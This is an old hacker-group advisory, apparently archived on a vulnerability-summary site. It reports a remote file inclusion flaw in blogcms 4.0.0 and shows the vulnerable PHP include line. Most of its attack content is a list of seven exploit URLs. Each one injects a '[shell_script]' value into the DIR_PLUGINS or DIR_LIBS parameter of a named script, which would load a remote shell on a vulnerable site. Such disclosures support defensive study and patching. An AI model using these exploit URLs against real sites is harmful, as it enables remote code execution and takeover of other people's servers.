Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Image gallery with Access Database SQL Injection

ASPintranet SQL Injection

Pilot Cart V.7.2 [ injection sql (post) ]

i-Gallery 3.4  Cross Site Scripting

From:	the_3dit0r_(at)_yahoo.com <the_3dit0r_(at)_yahoo.com>
Date:	17.11.2006
Subject:	blogcms => 4.0.0 Remote File Include

""""""""""""""
""""""""""""""
""""""""""""""
"""""
"""  ::     ::                :::::   ::::  """
"""   ::   ::                 ::  :   ::    """
"""     ::::    ::   :: ::::: :::::   ::::  """
"""    ::  ::   ::: ::: :: :: ::  ::    ::  """
"""  ::      :: :: :  : ::::: ::   :: ::::  """
"""                                         """
""""""""""""""
""""""""""""""
""""""""""""""
"""""
       Xmor$ DigitaL Hacking TeaM


# blogcms  => 4.0.0 Remote File Include Vulnerabilities
# Script.............. : blogcms
# Discovered by.... : the_Edit0r        
# Location .......... : Iran
# Class..............  : Remote
# Original Advisory : http://Www.Xmors.com ( Pablic ) http://Www.Xmors.net (pirv8)
# We ArE : Scorpiunix , KAMY4r , Sh3ll , SilliCONIC , Zer0.C0d3r
#      D3vil_B0y_ir , Tornado , DarkAngel , Behbood
# <Spical TNX Irania Hackers :
#  ( Aria-Security , Crouz , virangar ,DeltaHacking , Iranhackers
#   Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Virangar )
# Site download : devblog.outofthebloo.com


# CodE :
 require_once('themes/' . $blog_theme . '/user_style.php');


# Expl0itS :
http://Site/[path]/index.php?DIR_PLUGINS=[shell_script]
http://Site/[path]/install.php?DIR_LIBS=[shell_script]
http://Site/[path]/admin/libs/ADMIN.php?DIR_LIBS=[shell_script]
http://Site/[path]/admin/libs/globalfunctions.php?DIR_LIBS=[shell_script]
http://Site/[path]/admin/libs/MEMBER.php?DIR_LIBS=[shell_script]
http://Site/[path]/admin/libs/PLUGINADMIN.php?DIR_LIBS=[shell_script]
http://Site/[path]/admin/libs/SKIN.php?DIR_LIBS=[shell_script]



# Contact me : the_3dit0r[at]Yahoo[dot]coM